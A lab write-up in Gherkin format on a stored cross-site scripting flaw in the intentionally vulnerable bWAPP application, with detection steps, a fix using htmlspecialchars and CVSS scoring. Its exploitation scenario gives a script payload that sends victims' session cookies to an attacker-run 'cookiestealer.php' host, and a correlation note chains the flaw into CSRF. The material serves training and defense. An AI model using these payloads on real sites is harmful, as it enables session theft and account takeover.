## Version 1.4.1
## language: en

Feature:
  TOE:
    bWAPP
  Category:
    Cross Site Scripting
  Location:
    http://bwapp/xss_stored_2.php - genre (Parameter)
  CWE:
    CWE-79: Improper Neutralization of Input During Web Page Generation
    ('Cross-site Scripting')
  Rule:
    REQ.173: https://fluidattacks.com/web/en/rules/173/
  Goal:
    Execute JS code in the victims browser
  Recommendation:
    Sanitize user input

  Background:
  Hacker's software:
    | <Software name>       | <Version> |
    | Kali Linux            | 2017.3    |
    | Firefox Quantum       | 64.0b14   |
    | Burp Suite CE         | 1.7.36    |
    | beebox                | 1.6       |
  TOE information:
    Given I am running bWAPP on a beebox VM via VirtualBox on http://bwapp

  Scenario: Normal use case
    Given I go to bwapp/xss_stored_2.php
    Then I can select my favorite movie genre

  Scenario: Static detection
  Input isn't sanitized
    When I look at the code in "bwapp/xss_stored_2.php"
    """
    36  setcookie("movie_genre", $genre, time()+3600, "/", "", false, false);
    """
    Then I can see it uses raw user input to set the cookie
    Then it may be vulnerable to XSS if it gets reflected somewhere

  Scenario: Dynamic detection
  Triggering an alert
    Given I go to "http://bwapp/xss_stored_2.php"
    And I select "Horror" as my favorite genre
    Then I see the url change to "http://bwapp/xss_stored_2.php?genre=horror"
    And a new cookie "movie_genre" set to "horror"
    Then I try passing an alert payload as "genre"
    """
    http://bwapp/xss_stored_2.php?genre=<script>alert(1)</script>
    """
    Then I see the "movie_genre" cookie is set to "<script>alert(1)</script>"
    Then I go to "http://bwapp/smgmt_cookies_secure.php"
    And I get an alert (evidence)[alert.png]
    Then I know there is an XSS vulnerability

  Scenario: Exploitation
  Steal the user's cookies
    Given I use social engineering to trick a user into going to
    """
    http://bwapp/xss_stored_2.php?genre=<script>document.location='http://myserv
    er/cookiestealer.php?c='+document.cookie;</script>
    """
    Then they get directed to the "Select Favorite Genre" page
    And when they navigate to "http://bwapp/smgmt_cookies_secure.php"
    Then they get redirected to my site and I get their session cookies

  Scenario: Remediation
  Sanitize user input
    Given I have patched the code as follows
    """
    36  setcookie("movie_genre", htmlspecialchars($genre), time()+3600, "/", "",
    false, false);
    """
    Then I can't inject malicious code into the cookie anymore
    Then the vulnerability is fixed

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    7.1/10 (High) - AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N/
  Temporal: Attributes that measure the exploit's popularity and fixability
    6.6/10 (Medium) - E:F/RL:O/RC:C/
  Environmental: Unique and relevant attributes to a specific user environment
    6.6/10 (Medium) - CR:M/IR:M/AR:M

  Scenario: Correlations
    systems/bwapp/352-cross-site-request
      Given I trigger the XSS wit a payload that redirects to my CSRF
      Then I can reset the user's secret from there
